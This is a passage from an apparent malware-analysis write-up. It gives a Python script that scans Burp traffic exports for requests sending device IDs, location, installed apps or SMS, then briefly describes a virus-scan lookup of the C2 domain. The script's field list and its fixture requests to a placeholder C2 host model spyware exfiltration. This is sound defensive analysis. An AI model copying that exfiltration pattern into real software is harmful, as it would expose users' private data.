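import xml.etree.ElementTree as ET

# Field names taken from the captured cc_info / anti_logs bodies; the category grouping is my own.
SENSITIVE_FIELDS = {
    "device_id": {"umid", "aid", "oaid", "idfa", "zid", "atoken"},
    "location": {"lbs"},
    "installed_apps": {"installed_apps"},
    "sms": {"last_sms"},
}


def normalize_export(xml_text: str) -> str:
    """Burp writes <?xml version="1.1"?> and preserves raw NUL bytes (see the NOTE in its
    export); downgrade the declaration and drop NULs so a stock XML 1.0 parser accepts it."""
    xml_text = xml_text.replace("\x00", "")
    return re.sub(r"^\s*<\?xml[^>]*\?>", '<?xml version="1.0"?>', xml_text, count=1)


def split_http_message(raw: bytes):
    """Split a raw HTTP message into (start line, lower-cased header dict, body bytes)."""
    head, sep, body = raw.partition(b"\r\n\r\n")
    if not sep:  # exports that were re-saved with bare LF line endings
        head, sep, body = raw.partition(b"\n\n")
    lines = head.decode("latin-1").splitlines()
    headers = {}
    for line in lines[1:]:
        name, colon, value = line.partition(":")
        if colon:
            headers[name.strip().lower()] = value.strip()
    return (lines[0] if lines else ""), headers, body


def decode_body(body: bytes) -> bytes:
    """Transparently gunzip a body that starts with the gzip magic; leave anything else alone."""
    if body.startswith(b"\x1f\x8b"):
        try:
            return gzip.decompress(body)
        except OSError:
            return body
    return body


def walk_keys(obj, found: set) -> set:
    """Collect every dict key at any nesting depth of a parsed JSON value."""
    if isinstance(obj, dict):
        for key, value in obj.items():
            found.add(key)
            walk_keys(value, found)
    elif isinstance(obj, list):
        for value in obj:
            walk_keys(value, found)
    return found


def classify_body(body: bytes):
    """Sorted sensitivity categories present in a JSON body, or None if the body is not JSON."""
    try:
        data = json.loads(decode_body(body).decode("utf-8"))
    except (ValueError, UnicodeDecodeError):
        return None
    keys = walk_keys(data, set())
    return sorted(cat for cat, names in SENSITIVE_FIELDS.items() if keys & names)


def triage_burp_export(xml_text: str) -> list:
    """One finding per <item>: host, path, whether an appkey header was sent, what the body carries."""
    root = ET.fromstring(normalize_export(xml_text))
    findings = []
    for item in root.findall("item"):
        req = item.find("request")
        text = req.text or ""
        raw = base64.b64decode(text) if req.get("base64") == "true" else text.encode("utf-8")
        _, headers, body = split_http_message(raw)
        cats = classify_body(body)
        findings.append({
            "host": (item.findtext("host") or "").strip(),
            "path": (item.findtext("path") or "").strip(),
            "has_appkey_header": "appkey" in headers,
            "json_body": cats is not None,
            "categories": cats or [],
        })
    return findings


def exfiltrating(findings: list) -> list:
    """Findings whose body carries at least one sensitive category."""
    return [f for f in findings if f["categories"]]


ITEM = """  <item>
    <url><![CDATA[https://{host}{path}]]></url>
    <host ip="192.0.2.10">{host}</host>
    <method><![CDATA[{method}]]></method>
    <path><![CDATA[{path}]]></path>
    <request base64="{b64}"><![CDATA[{request}]]></request>
    <status>200</status>
  </item>
"""


def build_sample_export() -> str:
    """Constructed three-item export in Burp's format; the host and every value are placeholders."""
    host = "c2.example.invalid"
    plain = f"GET /cc_info HTTP/1.1\nHost: {host}\nUser-Agent: constructed\n\n"
    reg_body = json.dumps({"pkg": "com.example.app", "umid": "UMID-PLACEHOLDER",
                           "lbs": [{"lat": 0.0, "lng": 0.0}], "installed_apps": ["com.example.bank"]})
    registration = f"GET /cc_info HTTP/1.1\nHost: {host}\nContent-Length: {len(reg_body)}\n\n{reg_body}"
    hb_body = json.dumps({"umid": "UMID-PLACEHOLDER",
                          "anti": {"last_sms": {"sender": "95588", "content": "constructed"}}}).encode()
    # Assumption: the anti_logs body is gzip-compressed, as the server's "Not in GZIP format" reply suggests.
    heartbeat = (f"POST /anti_logs HTTP/1.1\r\nHost: {host}\r\nappkey: APPKEY-PLACEHOLDER\r\n"
                 f"Content-Encoding: gzip\r\n\r\n").encode() + gzip.compress(hb_body)
    items = (ITEM.format(host=host, path="/cc_info", method="GET", b64="false", request=plain)
             + ITEM.format(host=host, path="/cc_info", method="GET", b64="false", request=registration)
             + ITEM.format(host=host, path="/anti_logs", method="POST", b64="true",
                           request=base64.b64encode(heartbeat).decode("ascii")))
    return '<?xml version="1.1"?>\n<items burpVersion="constructed" exportTime="constructed">\n' + items + "</items>\n"


if __name__ == "__main__":
    for finding in triage_burp_export(build_sample_export()):
        print(finding)
```

Run it directly to print the findings for the constructed export, or pass the text of a real export to triage_burp_export. Items whose body is not JSON (such as the Safe Browsing protobuf POSTs in the capture above) are reported with json_body False instead of raising, and the empty-body GET requests come back with no categories, so the output singles out exactly the requests that carry identifiers, location, the app list or SMS content.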

0x04

Turning back, I ran a virus check on its domain (images are clickable):
It turns out to communicate with four thousand five hundred files.
I randomly picked two to look at; they are full of serious warnings:
